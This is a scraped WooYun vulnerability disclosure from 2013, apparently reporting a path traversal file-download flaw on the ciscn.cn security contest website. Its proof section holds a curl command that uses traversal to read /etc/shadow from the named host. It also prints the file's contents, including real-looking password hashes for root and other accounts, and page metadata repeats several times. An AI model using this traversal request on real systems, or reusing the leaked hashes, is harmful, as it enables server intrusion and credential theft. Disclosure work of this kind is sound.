全国大学生信息安全竞赛网任意文件下载漏洞（可读shadow）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-024162

漏洞标题：全国大学生信息安全竞赛网任意文件下载漏洞（可读shadow）

漏洞作者： freed0m

提交时间：2013-05-21 11:29

修复时间：2013-07-05 11:29

公开时间：2013-07-05 11:29

漏洞类型：任意文件遍历/下载

危害等级：低

自评Rank：1

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-05-21：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-07-05：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

全国大学生信息安全竞赛官网存在文件便遍历下载漏洞，系统文件可以被下载。
该网站是全国性比赛，实名制注册，会员数据具有很重要的价值，希望能把安全性做的更好。

详细说明：

可以下载shadow passwd等系统文件，有可能被直接提取服务器的可能
http://ciscn.cn/jsp/index/downFile.jsp?filename=/../..//../..//../..//../..//../..//etc/shadow

漏洞证明：

curl "http://ciscn.cn/jsp/index/downFile.jsp?filename=/../..//../..//../..//../..//../..//etc/shadow"
root:$6$ySYwDfU5Z/ZNQcYN$7XNWIgzcfeDuCoRVXGEYslVYw1/WB480TLjUnKw4kM6eQ8gO82w9o/drUHVlIyvmsjfI1NDW2kELMQFQOPAbI/:15737:0:99999:7:::
bin:*:15155:0:99999:7:::
daemon:*:15155:0:99999:7:::
adm:*:15155:0:99999:7:::
lp:*:15155:0:99999:7:::
sync:*:15155:0:99999:7:::
shutdown:*:15155:0:99999:7:::
halt:*:15155:0:99999:7:::
mail:*:15155:0:99999:7:::
uucp:*:15155:0:99999:7:::
operator:*:15155:0:99999:7:::
games:*:15155:0:99999:7:::
gopher:*:15155:0:99999:7:::
ftp:*:15155:0:99999:7:::
nobody:*:15155:0:99999:7:::
dbus:!!:15737::::::
usbmuxd:!!:15737::::::
rpc:!!:15737:0:99999:7:::
avahi-autoipd:!!:15737::::::
oprofile:!!:15737::::::
vcsa:!!:15737::::::
rtkit:!!:15737::::::
abrt:!!:15737::::::
hsqldb:!!:15737::::::
saslauth:!!:15737::::::
rpcuser:!!:15737::::::
nfsnobody:!!:15737::::::
postfix:!!:15737::::::
qpidd:!!:15737::::::
ricci:!!:15737::::::
haldaemon:!!:15737::::::
ntp:!!:15737::::::
apache:!!:15737::::::
radvd:!!:15737::::::
qemu:!!:15737::::::
avahi:!!:15737::::::
pulse:!!:15737::::::
gdm:!!:15737::::::
sshd:!!:15737::::::
luci:!!:15737::::::
tcpdump:!!:15737::::::
ccsec:$6$xn9N1em.Xan2CaUM$I3SixywdHqcpaGQUROkMfdYrj2g4qX53wsP1yM6zz78K8q3ZgYXg7t9970e7A0OBgTC/FCkkAaHi1qCUM9wLc0:15737:0:99999:7:::
mysql:!!:15737::::::
tomcat:!!:15737::::::
Mail:$6$Bb2Ll/lrs61$5bDnLSPqjX.gz6Y09mvpKaNrCXGItp2jCUUcGOC3LEX6nrwgKy4ow7JUzpaeP39k73.JBlcajd.UvUT/V/ECy1:15775:0:99999:7:::

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-024162

漏洞标题：全国大学生信息安全竞赛网任意文件下载漏洞（可读shadow）

相关厂商：全国大学生信息安全竞赛网

漏洞作者： freed0m

提交时间：2013-05-21 11:29

修复时间：2013-07-05 11:29

公开时间：2013-07-05 11:29

漏洞类型：任意文件遍历/下载

危害等级：低

自评Rank：1

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 freed0m@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-024162

漏洞标题：全国大学生信息安全竞赛网任意文件下载漏洞（可读shadow）

相关厂商：全国大学生信息安全竞赛网

漏洞作者： freed0m

提交时间：2013-05-21 11:29

修复时间：2013-07-05 11:29

公开时间：2013-07-05 11:29

漏洞类型：任意文件遍历/下载

危害等级：低

自评Rank：1

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-024162"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 freed0m@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：